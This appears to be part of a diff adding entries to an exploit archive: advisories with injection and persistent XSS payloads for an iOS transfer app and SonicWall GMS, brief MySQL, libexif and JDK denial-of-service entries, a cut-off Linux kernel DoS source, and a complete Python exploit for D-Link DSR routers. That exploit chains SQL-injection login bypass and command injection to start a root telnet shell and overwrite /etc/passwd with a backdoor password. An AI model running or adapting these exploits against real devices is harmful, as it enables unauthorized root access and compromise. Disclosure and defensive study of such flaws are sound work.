3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

191
platforms/hardware/webapps/30056.txt Executable file
View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
4. Switch back to the installed wireless transfer app and start the wifi transfer
5. Open the local web-server url http://localhost:6688/ (default link)
6. The local path/command execute occurs in the album name value of the photoGallery_head class
7. Successful reproduce of the vulnerability!
PoC: Album Name - photoGallery_head in the Album Sub Category List
<div class="header">
<div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
<div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
<div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
<div class="photoGallery_head">
<div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
<div class="phga_hd_right">
<input value="Zur?ck zur Sammlung" class="back" type="button">
</div>
</div>
</div>
PoC: Album Name - photoalbum in the Album Index List
<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
<dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl>
<dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
<img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl>
<dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
<img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl>
Reference(s):
http://localhost:6688/index.html
http://localhost:6688/albumhtm
http://localhost:6688/albumhtm?id=
http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable album name value.
Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
Security Risk:
==============
The security risk of the local command/path inject web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

303
platforms/hardware/webapps/30062.py Executable file
View file

@ -0,0 +1,303 @@
#!/usr/bin/python
#
# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on: D-Link DWC-1000
#
# Download URL: http://tsd.dlink.com.tw
#
# Arch: mips and armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2013-08-18
#
# Purpose: Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites: Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12: Informed Heise Security and asked for their support on this case
# 2013-09-13: Informed the manufacturer D-Link via
# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!)
# http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
# mail@dlink.ru (contact request sent)
# info@dlink.ee (contact request sent)
# info@dlink.de (contact request sent)
# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de
# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17: German BSI responds, contact established.
# 2013-09-24: Requested CVE-IDs.
# 2013-09-25: Heise responds, contact established.
# 2013-09-27: D-Link asks for details on vulns and the exploit code.
# Mitre assigns two CVEs:
# CVE-2013-5945 -- authentication bypass
# CVE-2013-5946 -- privilege escalation
# 2013-09-30: D-Link has received the exploit and documentation via BSI
# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03: Public Disclosure
#
# And now - the fun part :-)
#
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
#
##############################
cookie = ""
pid = -2
bduser = ""
def request(m = "", u = "", b = "", h = ""):
global ipaddr
conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
assert m in ["GET", "POST"]
conn.request(method = m, url = u, body = b, headers = h)
ret = conn.getresponse()
header = ret.getheaders()
data = ret.read()
conn.close()
return (header, data)
def login(user, passwd):
global ipaddr
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "index.htm",
'Users.UserName' : user,
'Users.Password' : passwd,
'button.login.Users.deviceStatus' : "Login",
'Login.userAgent' : "Exploit"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def logout():
global ipaddr, cookie
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = ""
return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
def execCmd(cmd = None):
global ipaddr, cookie
assert cmd != None
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
'Cookie': cookie,
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "systemCheck.htm",
'ping.ip' : "localhost;" + cmd,
'button.traceroute.diagDisplay' : "Traceroute"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def findPid(mystr = None):
# " 957 root 2700 S /usr/sbin/telnetd -l /bin/login"
assert mystr != None
mypid = 0
(h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
s = d.find(mystr)
if s > 0:
# telnetd is running
cand = d[s - 50 : s]
try:
mypid = int(cand.split("\n")[1].split()[0])
except IndexError:
mypid = int(cand.split(">")[1].split()[0])
return mypid
def restartTelnetd(mystr1 = None, mystr2 = None):
assert mystr1 != None and mystr2 != None
global pid
pid = findPid("telnetd -l /bin/")
if pid > 0:
# Stopping the running telnetd
print "[+] Stopping telnetd (" + str(pid) + "): ",
sys.stdout.flush()
(h, d) = execCmd("kill " + str(pid))
pid = findPid(mystr1)
if pid > 0:
print "FAILURE"
sys.exit(-1)
else:
print "OK"
# Starting a new telnetd
print "[+] Starting telnetd: ",
sys.stdout.flush()
(h, d) = execCmd("telnetd -l " + mystr2)
pid = findPid("telnetd -l " + mystr2)
if pid > 0:
print "OK (" + str(pid) + ")"
else:
print "FAILURE"
sys.exit(-1)
def main():
global ipaddr, cookie, pid, bduser, bdpasswd
user = "admin"
passwd = "' or 'a'='a"
print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
print "This change is non-persistent to device reboots."
print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
# Logging into the router
print "[+] Trying to log into the router: ",
sys.stdout.flush()
(h, d) = login(user, passwd)
if d.find("User already logged in") > 0:
print "FAILURE"
print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
sys.exit(-1)
elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
while h:
(c1, c2) = h.pop()
if c1 == 'set-cookie':
cookie = c2
break
print "OK (" + cookie + ")"
elif d.find("Invalid username or password") > 0:
print "FAILURE"
print "[-] Invalid username or password"
sys.exit(-1)
else:
print "FAILURE"
print "[-] Unable to login."
sys.exit(-1)
# Starting a telnetd with custom parameters
print "[+] Preparing the hack..."
restartTelnetd("/bin/login", "/bin/sh")
# Do the h4cK
print "[+] Hacking the router..."
print "[+] Getting the backdoor user name: ",
sys.stdout.flush()
tn = telnetlib.Telnet(ipaddr.split(":")[0])
tn.read_very_eager()
tn.write("cat /etc/profile\n")
time.sleep(5)
data = tn.read_very_eager()
for i in data.split("\n"):
if i.find('"$USER"') > 0:
bduser = i.split('"')[3]
break
if len(bduser) > 0:
print "OK (" + bduser + ")"
else:
print "FAILURE"
sys.exit(-1)
print "[+] Setting the new password for " + bduser + ": ",
sys.stdout.flush()
tn.write("cat /etc/passwd\n")
time.sleep(5)
data = tn.read_very_eager()
data = data.split("\n")
data.reverse()
data.pop()
data.reverse()
data.pop()
data = "\n".join(data)
for i in data.split("\n"):
if i.find(bduser) >= 0:
line = i.split(':')
s1 = string.lowercase + string.uppercase + string.digits
salt = ''.join(random.sample(s1,2))
pw = crypt.crypt(bdpasswd, salt)
line[1] = pw
# doesn't work for some odd reason -- too lazy to find out why
#salt = ''.join(random.sample(s1,8))
#line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
data = data.replace(i, ":".join(line))
break
tn.write('echo -en "" > /etc/passwd\n')
time.sleep(5)
for i in data.split("\n"):
tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
time.sleep(1)
data = tn.read_very_eager()
tn.close()
if data.find(pw) >= 0:
print "OK (" + pw + ")"
success = True
else:
print "FAILURE"
print "[-] Could not set the new password."
sys.exit(-1)
# Switching back to the originals
print "[+] Mobbing up..."
restartTelnetd("/bin/sh", "/bin/login")
# Logging out
print "[+] Logging out: ",
sys.stdout.flush()
(h, d) = logout()
if d.find('value="Login"') > 0:
print "OK"
else:
print "FAILURE"
print "[-] Unable to determine if user is logged out."
# Print success message
if success:
print "[+] You can now log in via SSH and Telnet by using:"
print " user: " + bduser
print " pass: " + bdpasswd
print " These changes will be reverted upon router reboot."
print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent."
main()
sys.exit(0)

234
platforms/jsp/webapps/30054.txt Executable file
View file

@ -0,0 +1,234 @@
Document Title:
===============
Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1099
Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf
Release Date:
=============
2013-12-05
Vulnerability Laboratory ID (VL-ID):
====================================
1099
Common Vulnerability Scoring System:
====================================
4.1
Product & Service Introduction:
===============================
Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing
security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from
a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a
managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs.
The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service
providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam,
backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive
policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS
software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL
security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service
providers that have either single-site or distributed multi-site environments.
(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application.
Vulnerability Disclosure Timeline:
==================================
2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-27: Vendor Notification (DELL SonicWall Security Team)
2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team)
2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team)
2013-12-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: GMS Networks Appliance Application 7.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application.
The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent).
The persistent vulnerability is located in the `valfield_1` & `value_1` value parameters of the `Alert Settings` module POST method request.
Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp
appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert
settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values.
To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself
disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter & exception-handling.
The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system)
count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL).
The hotfix and information has been provided in cooperation with the vulnerability-laboratory.
Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account.
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks,
persistent phishing or persistent manipulation of vulnerable module context.
Vulnerable Application(s):
[+] DELL - SonicWall GMS v7.1.x Appliance Application
Vulnerable Module(s):
[+] Alert Settings > NewThreshold
Vulnerable File(s):
[+] createNewThreshold.jsp > ematStaticAlertTypes.jsp
Vulnerable Parameter(s):
[+] valfield_1
[+] value_1
Affected Module(s):
[+] createNewThreshold
[+] ematStaticAlertTypes
[+] Alert Settings - Main Listing
Affected Product(s):
[+] Dell SonicWALL GMS
[+] Dell SonicWALL Analyzer
[+] Dell SonicWALL UMA E5000
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged or restricted guest accounts and
low user interaction. For security demonstration or reproduce the vulnerability follow the information and steps below.
Location: Alert Settings
http://gms.localhost:8080/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0#
Inject via Add: Edit contents for alert type: Backed-Up Syslog Files
http://gms.localhost:8080/sgms/ematStaticAlertTypes.jsp?
Execute: Create New Threshold
http://gms.localhost:8080/sgms/createNewThreshold.jsp?
Affected:
http://gms.localhost:8080/sgms/auth
Manual steps to reproduce ...
1. Open the Sonicwall GMS appliance application and login with full restrictions as guest
2. Switch to the vulnerable Console > Events > Alert Settings section
3. Click Add Alert and a new blank window of the application will be opened
4. Click in the upcomings window in the Alert Types section the Edit Content link
5. Now, a new window opens "Edit contents for alert type: Backup Sys-Log Files
6. On top is a little plus button next to the Threshold value
9. A new window opens with Elements box ... Inject your payload (script code) to the description eval in the operator fields
10. After the inject to the input fields the attacker only needs to click the Add Element button on the buttom of the page
11. The code will be directly executed and is persistent saved as element in the specific section
12. Save the input via update and go back to the alert settings main section were the code execute occurs in the same connected value
13. Successful reproduced!
PoC: Alert Settings - Create New Threshold
Critical</option></select> </td><td class="tblData2" width="1">
<img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td class="tblData2" align="center"
nowrap="nowrap"><input class="controlFont" name="disabled" value="1" type="checkbox"></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td>
<td class="tblData2" align="center" nowrap="nowrap"><a href="#" onclick="deleteElement(1);">
<img src="Create%20New%20Threshold_files/trash.gif" alt="Delete this destination" border="0"></a></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td></tr><tr><td></td>
<td class="tblData2" width="1"><img src="Create%20New%20Threshold_files/1x1trans.gif"></td><td colspan="5"
class="tblData2" align="left" nowrap="nowrap"> <font class="controlfont">Description: </font>
<input class="controlfont" size="64" name="description"
value="is equal to >" <[PERSISTENT INJECTED SCRIPT CODE!]" type="text"> >"<[PERSISTENT INJECTED SCRIPT CODE!]">"
onkeyup="enableAutoDesc(1,0);"></td><td class="tblData2"
width=1><img src="images/1x1trans.gif"></td>
Note: Please, feel free to read also the patch information provided in the solution section of the advisory document.
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse, prevention filter mechanism or clean encode of the vulnerable value_1 and valfield_1 parameters.
Also restrict and escape the affected input field and output listing in the connected modules.
Resolution (DELL SonicWall):
We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability with filter bypass is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

11
platforms/linux/dos/30020.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23911/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
Versions prior to MySQL 5.0.40 are vulnerable.
SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)));

9
platforms/linux/dos/30024.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23927/info
The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows.
Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of an application using the vulnerable library. Failed attempts will likely result in denial-of-service conditions.
Versions of libexif prior to 0.6.14 are vulnerable to this issue.
http://www.exploit-db.com/sploits/30024.jpg

9
platforms/linux/dos/30044.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24004/info
Sun JDK is prone to a multiple vulnerabilities.
An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected.
http://www.exploit-db.com/sploits/30043.zip

39
platforms/linux/dos/30080.c Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/24134/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users.
#include <sys/types.h>
#include <sys/ioctl.h>
#include <dirent.h>
#include <stdio.h>
#include <unistd.h>
